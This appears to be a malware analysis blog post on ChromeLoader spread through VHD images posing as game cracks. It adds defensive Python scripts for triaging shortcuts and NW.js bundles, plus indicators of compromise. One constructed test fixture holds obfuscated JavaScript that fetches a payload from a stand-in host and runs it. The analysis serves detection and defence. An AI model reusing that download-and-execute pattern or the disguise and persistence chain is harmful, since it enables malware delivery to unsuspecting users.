Since last year there has been a steady increase in cases where disk image files such as ISO and VHD are used to distribute malware, a trend that has been covered several times in previous ASEC blog posts. This post covers a recently discovered case of ChromeLoader being distributed inside VHD files. The VHD files carry filenames that make them look like hacks or cracks for Nintendo and Steam games; some of the filenames seen in distribution are listed below. A few of them impersonate paid software such as Microsoft Office and Adobe Photoshop instead of games.
- Filenames Used in Distribution
ELDEN RING Free Download (v1_08_1).vhd
Dark Souls 3 [FitGirl Repack]_part1_rar.vhd
Red Dead Redemption 2 Free Download (v1_0_1436_28).vhd
File_ Need for Speed Carbon Collectors Edition____.vhd
File_ Call of Duty Deluxe Edition_zip ___.vhd
File_ Portal_2_v2023_01_17_zip ___.vhd
File_ Minecraft – Story Mode_Complete Season_zi___.vhd
[NEW] ROBLOX _ Doors Script _ Hack _ Spawn Enti___.vhd
The Legend of Zelda_ Breath of the Wild SWITCH ___.vhd
Pokemon Ultra Moon_ Update 1_2 [Decrypted] 3DS ___ (1).vhd
Animal-Crossing-New-Horizons-Switch-NSPNSZXCI-U___.vhd
Mario Kart 8 Deluxe (NSP)(Booster Course DLC)(W___ (2).vhd
Super Mario Odyssey Switch NSP+ Update Free Dow___.vhd
Microsoft Office 2010 Free Download.vhd
Adobe Photoshop 2023 Free Download.vhd
Searching Google for any of the filenames above returns, at the very top of the results page, multiple websites that distribute illegal programs such as game hacks and cracks. Clicking through to download from any of these sites opens a chain of malicious advertisement pages, and the VHD files are assumed to have been served from one of those advertisement sites. At the time of writing, the same download chain delivers a benign program (a 7-Zip installer) instead.


A VHD file obtained this way is easy to mistake for a game-related program: on Windows 8 and later, double-clicking a VHD mounts it as a drive letter, so no extra tooling is needed to open it. The contents of the malicious VHD are shown below. Every file except Install.lnk has the hidden attribute set, so an ordinary user who mounts the image sees only Install.lnk.

Install.lnk runs properties.bat, which in turn extracts files.zip into the “%AppData%” path using the tar command (tar.exe has shipped with Windows 10 since version 1803, so the batch file needs no third-party archiver). files.zip holds legitimate files together with a malicious JS file for node-webkit (NW.js). NW.js is an application runtime that combines Chromium and Node.js: an NW.js application is launched through nw.exe, which reads package.json to find the script it should run. The attacker abuses exactly this behaviour in the steps that follow.


Afterwards, properties.bat runs the data.ini and videos.exe files produced by the extraction. Despite its extension, data.ini is a VBScript that creates a shortcut to videos.exe in the path “%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\”, so videos.exe is launched again at every user logon.
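Both shortcuts in this chain, Install.lnk launching the batch file and the Startup-folder shortcut pointing at videos.exe, are ordinary Windows shell links, so their targets can be recovered offline from the .lnk bytes without mounting anything or running the lure. The parser below is an added example for this post, not ASEC's tooling: it walks the ShellLinkHeader, IDList, LinkInfo and StringData sections laid out in [MS-SHLLINK] and flags shortcuts that launch a script host, pass a script on the command line, or point under AppData. The two shortcuts it parses are constructed by build_lnk for the example and are not the campaign's actual files; the triage rules and the assumed shortcut shapes are this example's own assumptions.

```python
"""Minimal Windows shell link (.lnk) parser for shortcut triage.
Added example for this post, not ASEC's code. Layout follows [MS-SHLLINK];
the two sample shortcuts below are constructed, not the campaign's files."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, IS_UNICODE = 0x10, 0x20, 0x80

SCRIPT_HOSTS = ("cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe")
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js", ".ps1")


def _string_data(buf, off, unicode):
    """One StringData entry: 2-byte character count, then the characters."""
    n = struct.unpack_from("<H", buf, off)[0]
    off += 2
    if unicode:
        return buf[off:off + 2 * n].decode("utf-16-le"), off + 2 * n
    return buf[off:off + n].decode("latin-1"), off + n


def parse_lnk(buf):
    """Return target, relative path, working dir and arguments of a shell link."""
    if len(buf) < 76 or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", buf, 20)[0]
    off = 76                                    # fixed-size ShellLinkHeader
    link = {"target": None, "relative_path": None, "working_dir": None, "arguments": None}
    if flags & HAS_ID_LIST:                     # skip the IDList; not needed for triage
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:
        li_size, _, li_flags = struct.unpack_from("<III", buf, off)
        if li_flags & 0x1:                      # VolumeIDAndLocalBasePath present
            base = off + struct.unpack_from("<I", buf, off + 16)[0]   # LocalBasePathOffset
            link["target"] = buf[base:buf.index(b"\x00", base)].decode("latin-1")
        off += li_size
    unicode = bool(flags & IS_UNICODE)
    if flags & HAS_NAME:                        # description string; not needed
        _, off = _string_data(buf, off, unicode)
    for bit, key in ((HAS_REL_PATH, "relative_path"), (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments")):
        if flags & bit:
            link[key], off = _string_data(buf, off, unicode)
    return link


def triage(link):
    """Reasons a shortcut deserves a closer look; an empty list means nothing odd."""
    reasons = []
    target = (link["target"] or link["relative_path"] or "").lower()
    args = (link["arguments"] or "").lower()
    if target.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        reasons.append("launches a script host")
    if any(ext in args for ext in SCRIPT_EXTS):
        reasons.append("arguments reference a script file")
    if "\\appdata\\" in target:
        reasons.append("target lives under AppData")
    return reasons


def build_lnk(target, rel_path, work_dir, args):
    """Constructed test input: a minimal but spec-conformant shell link (not a real sample)."""
    flags = HAS_ID_LIST | HAS_LINK_INFO | HAS_REL_PATH | HAS_WORK_DIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + b"\x00" * 52
    id_list = struct.pack("<H", 2) + b"\x00\x00"              # empty list: only the TerminalID
    volume_id = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"  # size, DRIVE_FIXED, serial, label offset, ""
    base = target.encode("latin-1") + b"\x00"
    base_off = 28 + len(volume_id)                            # LinkInfo header is 28 bytes
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 28, 1, 28, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"                   # VolumeID, LocalBasePath, CommonPathSuffix
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + id_list + link_info + sd(rel_path) + sd(work_dir) + sd(args)


# Constructed stand-ins for the two shortcuts in the chain (assumed shapes, not the real files).
INSTALL_LNK = build_lnk(r"C:\Windows\System32\cmd.exe", r"..\..\..\Windows\System32\cmd.exe", ".", "/c properties.bat")
STARTUP_LNK = build_lnk(r"C:\Users\user\AppData\Roaming\videos.exe", r"..\videos.exe", r"C:\Users\user\AppData\Roaming", "")

if __name__ == "__main__":
    for name, blob in (("Install.lnk", INSTALL_LNK), ("Startup\\videos.exe.lnk", STARTUP_LNK)):
        link = parse_lnk(blob)
        print(name, "->", link["target"], link["arguments"] or "", triage(link))
```

Run it against every .lnk in a mounted image or a user's Startup folder and the two rules that fire here, a script host with a script on its command line and a target under AppData, are the ones that separate this chain from a normal game shortcut. Real shortcuts usually carry an IDList and environment-variable blocks as well; the parser skips those by their size fields, so it still recovers the target.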

videos.exe is an NW.js runtime (nw.exe) and, on start, reads package.json and runs the script named by its main property. Here main points to start.html, which contains obfuscated malicious JavaScript. Because NW.js gives page scripts Node.js access, that JavaScript can reach the file system and the network like a native program rather than being confined to a browser sandbox.
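As an added example for this post (not ASEC's tooling or NW.js project code), the script below does the analyst's version of what nw.exe does with the extracted bundle described above: it reads package.json, follows main to the entry file, pulls the inline script bodies out of an .html entry and scores them for the obfuscation and Node.js reach this chain relies on. The "main" and "window" keys are genuine NW.js manifest fields; the indicator list, the two-hit verdict threshold and the sample bundle (a constructed package.json and start.html, not the campaign's files) are this example's own assumptions.

```python
"""Triage an extracted NW.js bundle the way nw.exe would load it.
Added example for this post, not ASEC's or the NW.js project's code.
'main' and 'window' are real NW.js manifest keys; the indicators, the
verdict threshold and SAMPLE_BUNDLE are this example's own assumptions."""
import json
import re

# Constructed bundle standing in for the files.zip contents; not the campaign's real files.
SAMPLE_BUNDLE = {
    "package.json": '{"name": "videos", "main": "start.html", "window": {"show": false}}',
    "start.html": r"""<html><body><script>
var _0x4b2a=['\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73','\x68\x74\x74\x70\x73','\x67\x65\x74'];
var cp=require(_0x4b2a[0]);var h=require(_0x4b2a[1]);
h[_0x4b2a[2]]('https://example.invalid/stage2',function(r){var b='';r.on('data',function(c){b+=c;});
r.on('end',function(){new Function(b)();});});
</script></body></html>""",
}

HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
SENSITIVE_MODULE = re.compile(r"""['"](child_process|fs|https?|os|net)['"]""")
EVAL_LIKE = re.compile(r"\b(eval|Function|unescape|atob)\s*\(")
URL = re.compile(r"""https?://[^\s'"]+""")
SCRIPT_TAG = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def entry_point(bundle):
    """The file nw.exe loads first: package.json -> 'main' (an .html or .js path)."""
    main = json.loads(bundle["package.json"]).get("main")
    if not isinstance(main, str) or main not in bundle:
        raise ValueError("package.json 'main' missing or not in bundle")
    return main


def script_bodies(bundle, main):
    """An .html entry runs its inline <script> blocks with Node access; a .js entry is the script."""
    text = bundle[main]
    return SCRIPT_TAG.findall(text) if main.lower().endswith(".html") else [text]


def unescape_hex(js):
    """Resolve \\xNN escapes so strings hidden by hex-escape obfuscation become searchable."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)


def indicators(js):
    """Countable signals: raw-text obfuscation plus what the decoded strings reveal."""
    decoded = unescape_hex(js)
    return {
        "hex_escapes": len(HEX_ESC.findall(js)),
        "eval_like": len(EVAL_LIKE.findall(js)),
        "node_modules": sorted(set(SENSITIVE_MODULE.findall(decoded))),
        "remote_urls": URL.findall(decoded),
    }


def triage(bundle):
    manifest = json.loads(bundle["package.json"])
    main = entry_point(bundle)
    ind = indicators("\n".join(script_bodies(bundle, main)))
    hits = sum([ind["hex_escapes"] >= 10, ind["eval_like"] > 0,
                bool(ind["node_modules"]), bool(ind["remote_urls"])])
    return {
        "entry": main,
        "hidden_window": manifest.get("window", {}).get("show") is False,  # app starts with no visible window
        "indicators": ind,
        "verdict": "suspicious" if hits >= 2 else "nothing obvious",       # threshold is an assumption
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_BUNDLE), indent=2))
```

The decode step matters: the module names and the download URL only become visible after the \xNN escapes are resolved, which is the same reason a signature on the raw start.html is fragile while a rule on "an .html entry with a hidden window that requires child_process or https" is not.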

Ultimately, videos.exe executes the malicious JavaScript in start.html, which connects to the addresses below and attempts to download ChromeLoader. At the time of analysis the addresses could not be reached. ChromeLoader is adware that carries out its malicious behaviour through a Chrome extension: the extension it creates and loads redirects the browser to advertisement websites and collects browsing data by hijacking the user's traffic. It is also capable of collecting browser credentials and modifying browser settings.
- irymountain.com[.]ua
- lesexwrecko[.]xyz
- alnormatic[.]xyz
Malware that uses disk image files has been on the rise recently, and disguising malware as game hacks and crack programs is a method employed by many threat actors. Users should be particularly cautious about executing files downloaded from unknown sources and are advised to obtain programs from their official websites. AhnLab’s anti-malware product, V3, detects and blocks this malware under the aliases below.
[File Detection]
Trojan/BAT.Runner.S2119 (2023.02.13.03)
Trojan/VBS.Runner.S2120 (2023.02.13.03)
Dropper/VHD.Agent (2023.02.16.00)
Trojan/HTML.Obfus (2023.02.16.00)
[IOC]
MD5
bdcb5c80a664d82a28469f9fce0fbb12
ae8ae62aa04f06d32c548c2ef493a39f
82024e7af52481e71760c9d119eb903f
3515115d7efa1ac42bd56bc9348cd4f8
Download addresses
irymountain.com[.]ua
lesexwrecko[.]xyz
alnormatic[.]xyz